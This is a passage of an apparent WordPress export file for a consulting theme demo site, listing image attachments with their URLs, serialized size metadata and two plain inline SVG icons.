		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:849;s:6:"height";i:878;s:4:"file";s:26:"2020/09/image-contacts.png";s:5:"sizes";a:6:{s:6:"medium";a:4:{s:4:"file";s:26:"image-contacts-290x300.png";s:5:"width";i:290;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"image-contacts-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:12:"medium_large";a:4:{s:4:"file";s:26:"image-contacts-768x794.png";s:5:"width";i:768;s:6:"height";i:794;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"image-contacts-600x400.png";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"image-contacts-600x600.png";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:26:"image-contacts-849x600.png";s:5:"width";i:849;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-typo</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/typography/pheader-typo/</link>
		<pubDate>Mon, 07 Sep 2020 04:22:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-typo.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>473</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 04:22:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 04:22:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-typo]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>471</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-typo.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-typo.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:24:"2020/09/pheader-typo.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:23:"pheader-typo-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"pheader-typo-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"pheader-typo-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"pheader-typo-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:25:"pheader-typo-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"pheader-typo-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"pheader-typo-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:25:"pheader-typo-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:25:"pheader-typo-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>down-arrow</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/typography/down-arrow/</link>
		<pubDate>Mon, 07 Sep 2020 08:24:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/down-arrow.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>480</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 08:24:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 08:24:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[down-arrow]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>471</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/down-arrow.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/down-arrow.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 490.688 490.688" style="enable-background:new 0 0 490.688 490.688;" xml:space="preserve">
<path style="fill:#FFC107;" d="M472.328,120.529L245.213,347.665L18.098,120.529c-4.237-4.093-10.99-3.975-15.083,0.262  c-3.992,4.134-3.992,10.687,0,14.82l234.667,234.667c4.165,4.164,10.917,4.164,15.083,0l234.667-234.667  c4.237-4.093,4.354-10.845,0.262-15.083c-4.093-4.237-10.845-4.354-15.083-0.262c-0.089,0.086-0.176,0.173-0.262,0.262  L472.328,120.529z"></path>
<path d="M245.213,373.415c-2.831,0.005-5.548-1.115-7.552-3.115L2.994,135.633c-4.093-4.237-3.975-10.99,0.262-15.083  c4.134-3.992,10.687-3.992,14.82,0l227.136,227.115l227.115-227.136c4.093-4.237,10.845-4.354,15.083-0.262  c4.237,4.093,4.354,10.845,0.262,15.083c-0.086,0.089-0.173,0.176-0.262,0.262L252.744,370.279  C250.748,372.281,248.039,373.408,245.213,373.415z"></path>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>add</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/typography/add/</link>
		<pubDate>Mon, 07 Sep 2020 08:50:32 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/add.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>481</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 08:50:32]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 08:50:32]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[add]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>471</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/add.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/add.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 492 492" style="enable-background:new 0 0 492 492;" xml:space="preserve">
<g>
	<g>
		<path d="M465.064,207.566l0.028,0H284.436V27.25c0-14.84-12.016-27.248-26.856-27.248h-23.116    c-14.836,0-26.904,12.408-26.904,27.248v180.316H26.908c-14.832,0-26.908,12-26.908,26.844v23.248    c0,14.832,12.072,26.78,26.908,26.78h180.656v180.968c0,14.832,12.064,26.592,26.904,26.592h23.116    c14.84,0,26.856-11.764,26.856-26.592V284.438h180.624c14.84,0,26.936-11.952,26.936-26.78V234.41    C492,219.566,479.904,207.566,465.064,207.566z"></path>
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/about-us/pheader-about-us/</link>
		<pubDate>Mon, 07 Sep 2020 09:01:47 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>489</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 09:01:47]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 09:01:47]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:28:"2020/09/pheader-about-us.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:27:"pheader-about-us-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"pheader-about-us-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:28:"pheader-about-us-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"pheader-about-us-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:29:"pheader-about-us-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:28:"pheader-about-us-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:28:"pheader-about-us-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:29:"pheader-about-us-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:29:"pheader-about-us-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/about-us/image1-about-us/</link>
		<pubDate>Mon, 07 Sep 2020 09:25:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>491</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 09:25:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 09:25:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image1-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:630;s:6:"height";i:475;s:4:"file";s:27:"2020/09/image1-about-us.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:27:"image1-about-us-300x226.jpg";s:5:"width";i:300;s:6:"height";i:226;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:27:"image1-about-us-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:27:"image1-about-us-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:27:"image1-about-us-600x475.jpg";s:5:"width";i:600;s:6:"height";i:475;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>features1-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/about-us/features1-about-us/</link>
		<pubDate>Mon, 07 Sep 2020 10:47:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/features1-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>501</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 10:47:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 10:47:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[features1-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/features1-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/features1-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:497;s:4:"file";s:30:"2020/09/features1-about-us.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:30:"features1-about-us-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"features1-about-us-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"features1-about-us-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:30:"features1-about-us-600x497.jpg";s:5:"width";i:600;s:6:"height";i:497;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>features2-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/about-us/features2-about-us/</link>
		<pubDate>Mon, 07 Sep 2020 10:47:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/features2-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>502</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 10:47:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 10:47:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[features2-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/features2-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/features2-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:497;s:4:"file";s:30:"2020/09/features2-about-us.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:30:"features2-about-us-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"features2-about-us-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"features2-about-us-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:30:"features2-about-us-600x497.jpg";s:5:"width";i:600;s:6:"height";i:497;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>features3-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/about-us/features3-about-us/</link>
		<pubDate>Mon, 07 Sep 2020 10:47:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/features3-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>503</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 10:47:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 10:47:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[features3-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/features3-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/features3-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:497;s:4:"file";s:30:"2020/09/features3-about-us.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:30:"features3-about-us-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"features3-about-us-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"features3-about-us-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:30:"features3-about-us-600x497.jpg";s:5:"width";i:600;s:6:"height";i:497;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/about-us/bg1-about-us/</link>
		<pubDate>Mon, 07 Sep 2020 10:49:47 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>504</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 10:49:47]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 10:49:47]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:570;s:4:"file";s:24:"2020/09/bg1-about-us.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:23:"bg1-about-us-300x89.jpg";s:5:"width";i:300;s:6:"height";i:89;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"bg1-about-us-1024x304.jpg";s:5:"width";i:1024;s:6:"height";i:304;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"bg1-about-us-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"bg1-about-us-768x228.jpg";s:5:"width";i:768;s:6:"height";i:228;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:25:"bg1-about-us-1536x456.jpg";s:5:"width";i:1536;s:6:"height";i:456;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"bg1-about-us-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"bg1-about-us-600x570.jpg";s:5:"width";i:600;s:6:"height";i:570;s: